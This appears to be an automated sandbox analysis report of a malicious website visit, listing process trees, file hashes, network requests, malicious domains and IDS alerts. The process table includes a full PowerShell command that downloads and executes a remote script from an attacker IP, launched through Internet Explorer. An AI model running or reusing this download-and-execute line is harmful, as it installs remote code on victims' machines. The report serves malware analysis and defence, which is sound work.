URL: | http://seemesex.world |
Full analysis: | https://app.any.run/tasks/6ed3b407-889f-4165-bd04-4a9f73b46dee |
Verdict: | Malicious activity |
Analysis date: | May 30, 2020, 16:30:38 |
OS: | Windows 10 Professional (build: 16299, 64 bit) |
Indicators: | |
MD5: | 3451C5CCAC21B0F1A09D6C59CADDD504 |
SHA1: | 0BC6234D36BC005358BA6C8385716E381722EC24 |
SHA256: | A00BB74C9EDC1DC54DEE348975C5AA1E6C3734864CA39D6DC3CD5825EDC1DB5F |
SSDEEP: | 3:N1KNAAIA88:CSAC8 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3680 | "C:\Program Files\internet explorer\iexplore.exe" "http://seemesex.world" | C:\Program Files\internet explorer\iexplore.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Version: 11.00.16299.15 (WinBuild.160101.0800) | ||||
4168 | "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3680 CREDAT:9474 /prefetch:2 | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | iexplore.exe | |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Version: 11.00.16299.15 (WinBuild.160101.0800) | ||||
1836 | "C:\Windows\System32\Macromed\Flash\FlashUtil_ActiveX.exe" -Embedding | C:\Windows\System32\Macromed\Flash\FlashUtil_ActiveX.exe | — | svchost.exe |
User: admin Company: Adobe Systems Incorporated Integrity Level: MEDIUM Description: Adobe® Flash® Player Utility Version: 29,0,0,171 | ||||
800 | ((((\..\PowerShell.exe -Command "<#AAAAAAAAAAAAAAAAAAAAAAAAA ((#>IEX (New-Object Net.WebClient).DownloadString('http://64.227.107.133/5953/jSIX?Timbang=UEAL&nG8Xer=9595_Oneill&cfJLd=1187');" | C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe | IEXPLORE.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Windows PowerShell Exit code: 0 Version: 10.0.16299.15 (WinBuild.160101.0800) | ||||
3580 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\WINDOWS\system32\conhost.exe | — | PowerShell.exe |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Console Window Host Exit code: 0 Version: 10.0.16299.15 (WinBuild.160101.0800) | ||||
200 | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\Low\4xjgo02r.cmdline" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | — | PowerShell.exe |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Visual C# Command Line Compiler Exit code: 0 Version: 4.7.2556.0 built by: NET471REL1 | ||||
484 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\Low\RES2E3E.tmp" "c:\Users\admin\AppData\Local\Temp\Low\CSC4F126634FE8B4F72912FBF2B67C3BA1.TMP" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | — | csc.exe |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 12.00.52519.0 built by: VSWINSERVICING |
PID | Process | Filename | Type | |
---|---|---|---|---|
800 | PowerShell.exe | C:\Users\admin\AppData\Local\Temp\Low\__PSScriptPolicyTest_xokpeyd5.hui.ps1 | — | |
MD5:— | SHA256:— | |||
800 | PowerShell.exe | C:\Users\admin\AppData\Local\Temp\Low\__PSScriptPolicyTest_1yqjz34a.nw4.psm1 | — | |
MD5:— | SHA256:— | |||
200 | csc.exe | C:\Users\admin\AppData\Local\Temp\Low\CSC4F126634FE8B4F72912FBF2B67C3BA1.TMP | — | |
MD5:— | SHA256:— | |||
484 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\Low\RES2E3E.tmp | — | |
MD5:— | SHA256:— | |||
200 | csc.exe | C:\Users\admin\AppData\Local\Temp\Low\4xjgo02r.dll | — | |
MD5:— | SHA256:— | |||
200 | csc.exe | C:\Users\admin\AppData\Local\Temp\Low\4xjgo02r.out | — | |
MD5:— | SHA256:— | |||
3680 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\UrlBlock\URL46D7.tmp | — | |
MD5:— | SHA256:— | |||
4168 | IEXPLORE.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\Low\IE\FZ4P8RAN\10105_jokiest_Couldn[1].js | text | |
MD5:F836C010B14CBA02592A81B59BDC4976 | SHA256:39078DE84082E083DE45C60334A78513F1ECB25BED11B326E22545591C9C44D6 | |||
3680 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\ZSVOB39W\iecompatviewlist[1].xml | xml | |
MD5:AD288DEDE9F96BA9BF5928EEBB84F430 | SHA256:11EE91F9612C0EEC7C2E218DBCC2566549BACED502669054B56DA7837D891D9C | |||
4168 | IEXPLORE.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\Low\IE\LD57I5PR\pervades_8497_11925[1].htm | html | |
MD5:914D2CEEC2AB02A814C0E680545F9F7A | SHA256:1F3B1F4B0A6FAFF6063ED8BB82A8FF11D78ED4BBE76EFF237743AE75AC853C86 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
4168 | IEXPLORE.EXE | GET | 302 | 148.251.72.21:80 | http://seemesex.world/ | DE | — | — | malicious |
800 | PowerShell.exe | GET | — | 64.227.107.133:80 | http://64.227.107.133/12018-Gaveling/9KSzP?aVVc=2797 | US | — | — | suspicious |
3680 | iexplore.exe | GET | 404 | 64.227.107.133:80 | http://64.227.107.133/favicon.ico | US | — | — | suspicious |
4168 | IEXPLORE.EXE | GET | 302 | 94.130.90.228:80 | http://atztds547.xyz/xn94r2398us2938u4s | DE | — | — | suspicious |
800 | PowerShell.exe | GET | 200 | 64.227.107.133:80 | http://64.227.107.133/5953/jSIX?Timbang=UEAL&nG8Xer=9595_Oneill&cfJLd=1187 | US | text | 2.08 Kb | suspicious |
4168 | IEXPLORE.EXE | GET | 200 | 64.227.107.133:80 | http://64.227.107.133/1966_04_15/Trinkums/pervades_8497_11925 | US | html | 4.90 Kb | suspicious |
4168 | IEXPLORE.EXE | POST | 200 | 64.227.107.133:80 | http://64.227.107.133/computing-Deperm/agkZId | US | text | 9.88 Kb | suspicious |
4168 | IEXPLORE.EXE | GET | 200 | 64.227.107.133:80 | http://64.227.107.133/795X/10105_jokiest_Couldn?gjMJD=Fumeuse_Ankusha_mislays | US | text | 28.2 Kb | suspicious |
4168 | IEXPLORE.EXE | POST | 200 | 64.227.107.133:80 | http://64.227.107.133/1989-05-27/Demarcate/W0p6/13110_5680?Chaliced=zxHq | US | text | 7.21 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3680 | iexplore.exe | 152.199.19.161:443 | iecvlist.microsoft.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
4276 | svchost.exe | 20.191.48.196:443 | settings-win-ppe.data.microsoft.com | Microsoft Corporation | US | unknown |
4168 | IEXPLORE.EXE | 148.251.72.21:80 | seemesex.world | Hetzner Online GmbH | DE | suspicious |
800 | PowerShell.exe | 64.227.107.133:80 | — | Peer 1 Network (USA) Inc. | US | suspicious |
4168 | IEXPLORE.EXE | 64.227.107.133:80 | — | Peer 1 Network (USA) Inc. | US | suspicious |
4168 | IEXPLORE.EXE | 94.130.90.228:80 | atztds547.xyz | Hetzner Online GmbH | DE | malicious |
3680 | iexplore.exe | 13.80.7.77:443 | urs.microsoft.com | Microsoft Corporation | NL | unknown |
3680 | iexplore.exe | 64.227.107.133:80 | — | Peer 1 Network (USA) Inc. | US | suspicious |
4168 | IEXPLORE.EXE | 13.80.7.77:443 | urs.microsoft.com | Microsoft Corporation | NL | unknown |
Domain | IP | Reputation |
---|---|---|
seemesex.world |
| malicious |
atztds547.xyz |
| suspicious |
urs.microsoft.com |
| whitelisted |
iecvlist.microsoft.com |
| whitelisted |
c.urs.microsoft.com |
| whitelisted |
ieonline.microsoft.com |
| whitelisted |
nexusrules.officeapps.live.com |
| whitelisted |
self.events.data.microsoft.com |
| whitelisted |
settings-win-ppe.data.microsoft.com |
| whitelisted |
dns.msftncsi.com |
| shared |
PID | Process | Class | Message |
---|---|---|---|
— | — | Potentially Bad Traffic | ET INFO Observed DNS Query to .world TLD |
4168 | IEXPLORE.EXE | Potentially Bad Traffic | ET INFO HTTP Request to Suspicious *.world Domain |
4168 | IEXPLORE.EXE | Potentially Bad Traffic | AV INFO HTTP Request to a *.xyz domain |